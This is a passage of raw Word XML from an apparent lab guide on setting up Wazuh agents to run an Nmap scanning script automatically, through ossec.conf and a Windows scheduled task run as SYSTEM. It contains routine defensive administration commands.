    </w:tbl>
    <w:p w14:paraId="6ABD4608" w14:textId="64CC2161" w:rsidR="006B7653" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512338E1" w14:textId="1611EAFD" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">       5</w:t>
      </w:r>
      <w:r w:rsidR="007B3EE9" w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007B3EE9" w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3EE9" w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Restart Wazuh agen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B3EE9" w:rsidRPr="001E2C55" w14:paraId="3326573D" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="62FA3093" w14:textId="7D1C56E9" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>sudo systemctl restart wazuh-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="620E3EE0" w14:textId="04BCA859" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350A0B41" w14:textId="72CB1F35" w:rsidR="009A7B95" w:rsidRDefault="009A7B95" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0C5E85" wp14:editId="4621BA68">
            <wp:extent cx="6644640" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8833793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4640" cy="2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51F943" w14:textId="77777777" w:rsidR="009A7B95" w:rsidRPr="007B3EE9" w:rsidRDefault="009A7B95" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578EFF60" w14:textId="4E4BD26A" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Deployment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122AB965" w14:textId="68F3D321" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Install Python, Nmap, and python-nmap:</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B3EE9" w14:paraId="75FFD510" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1AC0EAE3" w14:textId="2DCC9F2E" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:lastRenderedPageBreak/>
              <w:t>pip install python-nma</w:t>
            </w:r>
            <w:r>
              <w:t>p</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2221A540" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C172000" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ensure Nmap is installed (e.g., C:\Program Files (x86)\Nmap) and added to the system PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E335E56" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Open Environment Variables → System Variables → Path → Edit → Add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B70E3D" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA23E2" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This allows Python’s nmap module to find the Nmap executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F7A40" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Test the Python script manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2722D" w14:textId="608FF0C5" w:rsidR="00D44321" w:rsidRDefault="00D44321" w:rsidP="00D44321">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Add nmapscan.py in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D44321">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\soc-script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B3EE9" w:rsidRPr="001E2C55" w14:paraId="180249D1" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2827C020" w14:textId="4A191816" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007F6EAA" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007F6EAA">
              <w:t>&amp; "C:\Users\Administrator\AppData\Local\Programs\Python\Python313\python.exe" "C:\Program Files (x86)\soc-scripts\nmapscan.py"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EB36DB6" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50520AA9" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Expected result: JSON entries are appended to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766FDCCB" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\ossec-agent\active-response\active-responses.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C764B10" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configure ossec.conf to run the script automatically:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B7653" w14:paraId="502518E7" w14:textId="77777777" w:rsidTr="006B7653">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1AE4D528" w14:textId="77777777" w:rsidR="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B413F1" w14:textId="42920F5C" w:rsidR="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;log_format&gt;full_command&lt;/log_format&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00450133">
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:t>&lt;command&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00450133" w:rsidRPr="00450133">
              <w:t>"C:\Users\Administrator\AppData\Local\Programs\Python\Python313\python.exe" "C:\Program Files (x86)\soc-scripts\nmapscan.py"</w:t>
            </w:r>
            <w:r>
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416DCAAF" w14:textId="590075EE" w:rsidR="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  &lt;frequency&gt;900&lt;/frequency&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="300BCF86" w14:textId="2C057604" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23D6ADC3" w14:textId="77777777" w:rsidR="006B7653" w:rsidRPr="007B3EE9" w:rsidRDefault="006B7653" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D1A136" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restart Wazuh agen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6B7653" w14:paraId="3BB4F2FB" w14:textId="77777777" w:rsidTr="006B7653">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="544D7CAE" w14:textId="5A17C711" w:rsidR="006B7653" w:rsidRPr="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="006B7653">
              <w:t>Restart-Service -Name wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="271D1B00" w14:textId="77777777" w:rsidR="006B7653" w:rsidRDefault="006B7653" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3389BA" w14:textId="4183291A" w:rsidR="00275941" w:rsidRPr="00275941" w:rsidRDefault="00275941">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Important : </w:t>
      </w:r>
      <w:r w:rsidRPr="00275941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>Create a scheduled task to run the script every 15 minutes as SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00275941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w: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275941" w:rsidRPr="001E2C55" w14:paraId="2D166577" w14:textId="77777777" w:rsidTr="00275941">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F56DF86" w14:textId="4FC91131" w:rsidR="00275941" w:rsidRDefault="00275941" w:rsidP="00275941">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t># Create a Scheduled Task for auto Nmap scan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250F6888" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>$action = New-ScheduledTaskAction -Execute "C:\Users\Administrator\AppData\Local\Programs\Python\Python313\python.exe" `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B29FDED" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -Argument "`"C:\Program Files (x86)\soc-scripts\nmapscan.py`""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FF42BD" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FB03E19" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t># Trigger: start 1 min from now, repeat every 15 minutes, max 9999 days</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274B4596" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB952C1" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -RepetitionInterval (New-TimeSpan -Minutes 15) `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A85FA0" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -RepetitionDuration (New-TimeSpan -Days 9999)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6948BA" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4117EBF9" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t># Register the scheduled task as SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DC49895" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t>Register-ScheduledTask -TaskName "NmapAutoScan" `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1E5FE7" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -Action $action `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A51D73E" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -Trigger $trigger `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40BB3373" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -RunLevel Highest `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B19905" w14:textId="77777777" w:rsidR="00222515" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -User "SYSTEM" `</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D2DB21B" w14:textId="00483148" w:rsidR="00275941" w:rsidRPr="00275941" w:rsidRDefault="00222515" w:rsidP="00222515">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    -Description "Automatically runs nmapscan.py every 15 minutes for Wazuh alerts"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32D7F11E" w14:textId="503781C8" w:rsidR="00275941" w:rsidRDefault="00275941" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F1B27A4" w14:textId="641F0130" w:rsidR="009756BA" w:rsidRDefault="009756BA" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TO know</w:t>
      </w:r>
      <w:r w:rsidRPr="009756BA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009756BA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Next Run Time</w:t>
      </w:r>
      <w:r w:rsidRPr="009756BA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009756BA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Last Run Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="009756BA" w:rsidRPr="001E2C55" w14:paraId="779FA2DA" w14:textId="77777777" w:rsidTr="009756BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="17140F67" w14:textId="05AC8B15" w:rsidR="009756BA" w:rsidRDefault="009756BA" w:rsidP="009756BA">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="009756BA">
              <w:t>Get-ScheduledTask -TaskName "NmapAutoScan" | Get-ScheduledTaskInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3298C4C5" w14:textId="77777777" w:rsidR="009756BA" w:rsidRPr="00275941" w:rsidRDefault="009756BA" w:rsidP="006B7653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426E3B50" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
